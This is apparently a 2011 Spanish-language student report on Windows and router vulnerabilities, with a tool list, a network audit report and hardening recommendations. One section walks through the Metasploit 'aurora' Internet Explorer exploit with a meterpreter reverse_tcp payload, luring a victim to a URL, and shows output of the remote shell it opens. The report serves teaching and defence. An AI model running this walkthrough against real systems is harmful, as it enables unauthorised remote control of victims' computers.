VULNERABILIDADES DE WINDOWS

Vulnerabilidades de Windows 16 de mayo de 2011 INTRODUCCION: El siguiente documento contiene lo que son algunas de las vulnerabilidades del Sistema Operativo Windows, las cuales pueden ocasionar que a travs de ellas se produzca algn tipo de ataque que afecte la seguridad de la datos que se encuentren almacenados dentro del equipo. El detectar los posibles ataques a los que se puede ver afectado ayuda a brindar una mayor seguridad al sistema. Y prevenir que se vea atacado por personas que le den un mal uso a la informacin o que ocasionen graves problemas dentro de la organizacin. As como tambin se darn a conocer algunas de las vulnerabilidades que se tienen en el uso de algunos tipos de rauters.

Vulnerabilidad en DNS Microsoft ha reportado que est investigando reportes de ataques que explotan una vulnerabilidad en el servicio DNS (DomainNameSystem) de servidor en sistemas Microsoft Windows 2000 SP4, Windows Server 2003 SP1, y Windows Server 2003 SP2. La vulnerabilidad es del tipo buffer overrun (desbordamiento de memoria) en la interfaz RPC (RemoteProcedureCall) del servicio DNS. RPC es un protocolo que un programa puede usar para requerir un servicio desde un programa alojado en otra computadora en la red. De acuerdo con el reporte de Microsoft, los intentos para explotar esta vulnerabilidad podran permitir a un atacante ejecutar cdigo en el contexto de

Pgina 2

Vulnerabilidades de Windows 16 de mayo de 2011 seguridad del servicio DNS, que de forma predeterminada se ejecuta como SYSTEM local. Hasta la fecha no existe parche de seguridad para corregir la vulnerabilidad Ataque por Correo Electronico Para que tenga xito este tipo de ataque, el atacante tendra que enviar un correo electrnico con un archivo adjunto de Microsoft Word o Power Point que incluyera una imagen en miniatura especialmente manipulada y convenciera al usuario de que abriera dicho documento, ha explicado la compaa. El atacante, asegura Microsoft, tambin podra poner el archivo con la imagen maliciosa en una red compartida y que las vctimas potenciales llegaran a la localizacin del archivo a travs del explorador de Windows. El fallo, que afecta al motor de renderizacin grfica de Windows, podra permitir que un atacante ejecutara cdigo arbitrario en el contexto de seguridad del usuario conectado, lo que significa que las cuentas que estn configuradas para tener menos derechos se veran afectadas menos. La vulnerabilidad afecta a Windows XP Service Pack 3, XP Professional x64 EditionService Pack 2, Server 2003 Service Pack 2, Server 2003 x64 EditionService Pack 2, Server 2003 con SP2 para sistemas basados en Itanium, Vista Service Pack 1 y Service Pack 2, Vista x64 EditionService Pack 1 y Service Pack 2, Server 2008 para 32-bit, 64-bit, y sistemas basados en Itanium. El problema no afecta al sistema operativo para PC ms reciente de Microsoft, Windows 7, ni a su sistema operativo para servidores, Windows Server 2008 R2. Ataques Land Tanto Windows XP SP2 como W2003 siguen siendo vulnerables a ataques LAND. Este tipo de ataques no son nuevos y se producen cuando la mquina vctima recibe paquetes SYN con la misma IP de origen y destino, lo que provoca que empiece a generar paquetes ACK tratando de responderse a s misma en lo que podra ser un bucle sin fin, con alto consumo de CPU y saturacin, llegndose a la denegacin de servicio. Es algo que los reglajes internos de algunos firewalls y routers evitan, filtrando los paquetes con la misma direccin de origen y destino. Defecto en archivo de Windows Muchas funciones claves de Windows se ven amenzadas con la alta vulnerabilidad que presenta el componente del ncleo llamado win32k.sys, el cual puede ser atacado por usuarios locales y ocasiona la aparicin de la famosa pantalla azul, cono de las fallas graves de sistema. Este defecto tambin permite al atacante ejecutar cdigos libremente, lo que puede ocasionar diferentes problemas al sistema operativo, dependiendo de la amplitud de accin de quien intenta hacer el dao. El componente win32k.sys se encarga de gestionar las ventanas y los grficos 2D de Windows, por lo que su funcin es clave a nivel de usuario. Una manipulacin maliciosa de este archivo puede hacer colapsar la parte grfica de Windows y con ello la pantalla, entre otras cosas.

Pgina 3

Vulnerabilidades de Windows 16 de mayo de 2011 La vulnerabilidad de este componente afecta a Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows Server 2008 R2 y Windows 7, tanto para x86 y x64, tengan o no aadidos Service Packs. Esta falla tambin hace posible que cualquier usuario normal pueda acceder como si tuviera privilegios y, a partir de eso, ejecutar las alteraciones maliciosas en el sistema. Windows XP SP3 IE 7,8 Ejecucin remota de cdigo Este ataque, funciona con internet explorer 7,8 pero slo cuando se utiliza en windows XP. Si se utiliza Vista o windows 7, No son vulnerables. El error, en el archivo WinHlp32.exe va en el desbordamiento de la pila, y nos permite ejecutar cdigo. Es posible invocar winhlp32.exe desde Internet Explorer 8,7,6 con VBScript. Pasando malintencionado.Podra permitir archivo HLP winhlp32 atacante remoto ejecutar comandos arbitrarios. Adems, existe una vulnerabilidad de desbordamiento de pila en winhlp32.exe. Se ve afectado Windows XP SP3 no afecta a Vista, Windows 7. Para activar la vulnerabilidad es necesaria alguna interaccin del usuario. Vctima tiene que Presione F1 cuando se muestra el men emergente MsgBox. Sintaxis de la funcin MsgBox: MsgBox(prompt[,buttons][,title][,helpfile,context]) Es posible pasar compartido remoto samba como parmetro helpfile. Adems hay un bfer de pila basada desbordamiento cuando helpfile ,parmetro es demasiado largo. Sin embargo, en XP winhlp32.exe se compila con /Bandera de GS, que, en este caso, efectivamente proteger la pila. La vulnerabilidad permite a un atacante remoto ejecutar cdigo arbitrario en mquina de la vctima.

Hackear WINDOWS con metasploit y IE Usando este exploit, Podremos tomar el control de la mquina remota con los privilegios del usuario que est navegando por internet. Ataque realizado desde Ubuntu a Windows. La primera cosa a hacer, que Metasploit est abierto en la consola

Pgina 4

Vulnerabilidades de Windows 16 de mayo de 2011 Una vez instalado, o si ya tenemos, la primera cosa a hacer, actualizar la vulnerabilidad para obtener lo que, a continuacin, escribir:

svnupdate abrirlo: sudo ./msfconsole Pues ahora se sube la vulnerabilidad. A continuacin, el tipo de consola: use exploit/windows/browser/ms10_002_aurora acontinuacin,: set PAYLOAD windows/meterpreter/reverse_tcp acontinuacin,: set LHOST NOSTRO IP (lo possiamovedere digitando: ifconfig ) acontinuacin,: set URIPATH / y finalmente lanzar el ataque escribiendo: exploit En este punto se tiene una salida como esta:

[*] Exploit running as background job. [*] Started reverse handler on port 4444 [*] Local IP: http//NOSTRO_IP:8080/ [*] Server started. msfexploit(ie_aurora) > En este momento tan visite nuestra Buddy Esta direccin: http//NOSTRO_IP:8080/ Una vez que nuestro compaero visitar esa direccin, Tendremos una salida como esta: [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514) pues ahora se debe escribir: sessions -i 1 Ahora para abrir el tipo de concha: Shell Recibimos esta salida: Process 892 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop> Vulnerabilidades ms crticas de los sistemas Windows

Pgina 5

Vulnerabilidades de Windows 16 de mayo de 2011 Existencia de servidores web y sus servicios asociados Cuando se instala un servidor web en un equipo Windows, en su configuracin por defecto, se activan algunos servicios y/o configuraciones que son vulnerables a diversos tipos de ataques, que van desde la denegacin de servicio hasta el compromiso total del sistema. Si la mquinadebe actuar como servidor web, es preciso verificar que la versin del mismo est actualizada, se ha fortalecido la configuracin y se han desactivado los servicios innecesarios. Es importante indicar que algunas versiones de Windows instalan, en su configuracin por defecto, el servidor web IIS. Servicio Workstation Existe una vulnerabilidad de desbordamiento de bfer en el servicio Workstation de Windows 2000 (SP2, SP3 y SP4) y Windows XP (hasta SP1) que puede ser utilizada por un usuario remoto para forzar la ejecucin de cdigo en los sistemas vulnerables. ste cdigo se ejecutar en el contexto de seguridad SYSTEM, lo que permite un acceso completo en el sistema comprometido. Servicios de acceso remoto de Windows Todas las versiones de Windows incluyen mecanismos para permitir el acceso remoto tanto a las unidades de disco y al registro as como para la ejecucin remota de cdigo. Estos servicios han demostrado ser bastante frgiles y la existencia de numerosas vulnerabilidades ha sido uno de los mecanismos preferidos por los gusanos y virus para propagarse. Es muy importante verificar que se han aplicado las diversas actualizaciones publicadas para impedir la acciones de los mismos. Microsoft SQL Server El gestor de base de datos de Microsoft ha sido, tradicionalmente, un producto con un nivel de seguridadmuybajo. Por un lado, existen un gran nmero de vulnerabilidades de seguridad, muchas de ellas crticas, que pueden ser utilizadas para acceder y/o modificar a la informacin almacenada en las bases de datos. Peroadems, la configuracin por defecto de Microsoft SQL Server facilita que sea utilizado como plataforma para la realizacin de ataques contra otros sistemas. Podemos recordar los gusanos SQLSnake y Slammer que tuvieron un efecto perceptible en toda la red Internet.

Autenticacin de Windows Es habitual encontrar equipos Windows con deficiencias en sus mecanismos de autenticacin. Esto incluye la existencia de cuentas sin contrasea (o con contraseas ampliamente conocidas o fcilmente deducibles). Por otra parte es frecuente que diversos programas (o el propio sistema operativo) cree nuevas cuentas de usuario con un dbil mecanismo de autenticacin.

Pgina 6

Vulnerabilidades de Windows 16 de mayo de 2011

Por otra parte, a pesar de que Windows transmite las contraseas cifradas por la red, dependiendo del algoritmo utilizado es relativamente simple aplicar ataques de fuerza bruta para descifrarlos en un plazo de tiempo muy corto. Es por tanto muy importante verificar que se utilizado el algoritmo de autenticacin NTLMv2. Navegadores web Los diversos navegadores habitualmente utilizados para acceder a la web pueden ser un posible punto dbil de las medidas de seguridad si no se han aplicado las ltimas actualizaciones. Internet Explorer es, sin duda, el producto para el que se han publicado ms actualizaciones y que cuenta con algunos de los problemas de seguridad ms crticos. No obstante debe recordarse que otros navegadores como Opera, Mozilla, Firefox y Netscape tambin tienen sus vulnerabilidades de seguridad. Aplicaciones de comparticin de archivos Las aplicaciones P2P se han popularizado en los ltimos aos como un sistema para la comparticin de informacin entre los usuarios de Internet, hasta el punto de convertirse en uno de los mtodos preferidos para obtener todo tipo de archivos. De hecho, muchos usuarios seguramente no entenderan la red actual sin la existencia de las aplicaciones P2P. No obstante, algunas aplicaciones populares de comparticin de archivos tienen serios problemas de seguridad que pueden ser utilizados por un atacante para obtener el control del ordenador del usuario. Otro riesgos habituales, no estrictamente de seguridad pero si relacionado ya que atentan contra nuestra privacidad, son los diversos programas espas incluidos en algunas de las aplicaciones ms populares de comparticin de archivos.Otro problema habitual es la comparticin inadvertida de archivos quecontieneninformacin sensible. Por ltimo, en los ltimos meses se ha popularizado la utilizacin de las redes P2P como un nuevo mecanismo para la distribucin de virus y gusanos. Subsistema LSAS El subsistema LSAS (Local Security AuthoritySubsystem) de Windows 2000, Windows Server 2003 y Windows XP es vulnerable a diversos ataques de desbordamiento de bfer que pueden permitir a un atacante remoto obtener el control completo del sistema vulnerable. Esta vulnerabilidad ha sido explotada por gusanos como el Sasser. Programa de correo

Pgina 7

Vulnerabilidades de Windows 16 de mayo de 2011 Diversas versiones de Windows incluyen de forma estndar el programa de correo Outlook Express. Se trata de un producto que, si no se encuentra convenientemente actualizado, puede fcilmente comprometer la seguridad del sistema. Los principales problemas de seguridad asociados a Outlook Express son la introduccin de virus (sin que sea necesario ejecutar ningn programa) y el robo de informacin sensible. Las versiones actuales de Outlook Express, configuradas de una forma adecuada, protegen al usuario ante estos problemas de seguridad. Sistemas de mensajera instantnea La mensajera instantnea ha pasado de ser un sistema de comunicacin utilizado bsicamente para contactar con amigos y familiares a ser una herramienta de comunicacin habitualmente utilizada en las empresas, especialmente entre aquellas que disponen de diversos centros de trabajo. Los diversos programas de mensajera instantnea pueden ser vctimas de ataques explotables de forma remota y que pueden ser utilizados para obtener el control de los sistemas vulnerables. Es conveniente que el usuario de estos productos verifique que utiliza la versin actual, con las ltimas actualizaciones de seguridad. VULNERABILIDADES DE LOS RAUTERS Suplantacin de identidad Son susceptibles a interceptar y redireccionar trfico a fin de acceder a la configuracin del router; e incluso a los datos de los ordenadores de la red local. Esto se consigue haciendo que la vctima visite una pgina web diseada para que engae al router y tome como IP secundaria de la pgina web la misma que la IP del router. El engao se basa en una antigua tcnica llamada DNS rebinding. La facilidad en el acceso a la configuracin del router, se ve afectada si ha sido cambiada los datos de acceso por defecto del router, dificultando as el acceso al panel de configuracin del mismo.

Se recomienda cambiar los datos de acceso a la configuracin del router; siempre y cuando el usuario/contrasea sean los que venan por defecto en el router.
Ataques mediante UPnP El protocolo UPnP (Universal Plug and Play) permite que diferentes dispositivos en una red "conversen" entre ellos y que puedan autoconfigurarse. Por ejemplo, una aplicacin de mensajera como el Messenger utiliza el puerto 1503 para recibir un fichero de uno de nuestros contactos. Mediante UPnP, es capaz de detectar y configurar el firewall de la red para abrir y redireccionar este puerto.

Pgina 8

Vulnerabilidades de Windows 16 de mayo de 2011 Lo que se advierte es la facilidad con la que cualquier aplicacin web puede modificar la configuracin de nuestra red. Simplemente visitando un sitio web malicioso que contenga un flash con las instrucciones precisas puede modificar por ejemplo los DNS utilizados por nuestro router. Este es el proceso normal de un dispositivo UPnP 1. Un dispositivo se conecta a la red 2. Obtiene una IP mediante DHCP 3. Lanza una peticin UDP a 239.255.255.250:1900 y espera respuesta de los equipos con UPnP 4. Estos responden anunciando la URL desde la que pueden ser controlados 5. El dispositivo enva mensajes SOAP a esta URL con los cambios necesarios Lo que hace la aplicacin flash, es llamar directamente a esa URL, solicitando por ejemplo el cambio de DNS. Esta URL de control es distinta en cada modelo de router por lo que el riesgo se reduce, ya que la aplicacin flash deber probar con cientos de URLs si quiere soportar el mximo nmero de routers. Es especialmente grave en el caso de los routerswifi, ya que cualquier cliente conectado puede utilizar una herramienta UPnP para manipular los parmetros del router..De momento la solucin pasa por desactivar la caracterstica UPnP en el router. HERRAMIENTAS PARA HACKEAR CAIN AND ABEL Cain and Abel es una herramienta diseada especialmente para administradores de redes con la que puedes comprobar el nivel de seguridad de una red local domstica o profesional. El programa permite recuperar contraseas de una amplia variedad de protocolos, entre ellos FTP, SMTP, POP3, HTTP, MySQL, ICQ, Telnet y otros, adems de poder recuperar tambin las claves ocultas en Windows bajo la tpica lnea de asteriscos. El programa incluye otras utilidades destinadas a la administracin y control de redes.

HERRAMIENTAS PARA LINUX.

Pgina 9

Vulnerabilidades de Windows 16 de mayo de 2011 Ettercap es un interceptor/sniffer/registrador para LANs con switch. SSLStrip una herramienta que automatiza el ataque sobre la conexin SSL. Driftnet programa que escucha el trfico de red y elige imgenes de flujos TCP que observa. WiFiSlax es una distribucin GNU/Linux en formato *.iso con funcionalidades de LiveCD y LiveUSB pensada y diseada para la auditora de seguridad y relacionada con la seguridad informtica en general. WiFiSlax incluye una larga lista de herramientas de seguridad y auditora listas para ser utilizadas, entre las que destacan numerosos escner de puertos y vulnerabilidades, herramientas para creacin y diseo de exploits, sniffers, herramientas de anlisis forense y herramientas para la auditora wireless, adems de aadir una serie de tiles lanzadores.

Pgina 10

Vulnerabilidades de Windows 16 de mayo de 2011

FUENTES http://www.clshack.it/es/exploit-windows-xp-sp3-ie-7-8-remote-code-execution.html http://www.clshack.it/es/hack-windows-con-metasploit-e-ie-0day-aka-aurora-exploit.html http://www.auditoria.com.mx/not/incidant.htm http://blog.digitalmarketing.cl/defecto-en-archivo-de-windows-lo-hace-vulnerable-a-ataques/ http://www.somoslibres.org/modules.php?name=News&file=article&sid=307 http://bandaancha.eu/articulo/5312/mayoria-routers-son-vulnerables-ataques-mediante-upnp http://foro.elhacker.net/hacking_linuxunix/how_to_sniffing_en_linux_ettercapsslstripdriftnett280295.0.html#ixzz1OYsIn94v http://es.wikipedia.org/wiki/WiFiSlax

Pgina 11

Vulnerabilidades de Windows 16 de mayo de 2011

REPORTE 1. Una de las principales vulnerabilidades detectadas fue que la red no tena contrasea y era pblica. 2. El rauter tena 2 usuarios un User y un Admin, el user no tena contrasea y la contrasea del Admin se poda obtener viendo las propiedades del rautes con el User y la contrasea estaba basada solo en nmeros. 3. Cuando hay actividad en el servidor, con las herramientas para hackear es ms fcil encontrar la contrasea ya que se empiezan a generar an ms paquetes. 4. La red se encontraba oculta, pero con herramientas para administrar el trfico de red, se pueden detectar.

RECOMENDACIONES 1. La red debera tener contrasea. 2. El rauter no tendra que tener la misma contrasea en el admin y el user. 3. Las contraseas deberan contener tanto nmeros como letras para que sea ms difcil de descifrar. 4. El servidor debe tener contrasea para que no sea fcil el conectarse por escritorio remoto. 5. Se deben fijar directivas para que no se pueda acceder tan fcilmente a los archivos dentro del servidor.

Pgina 12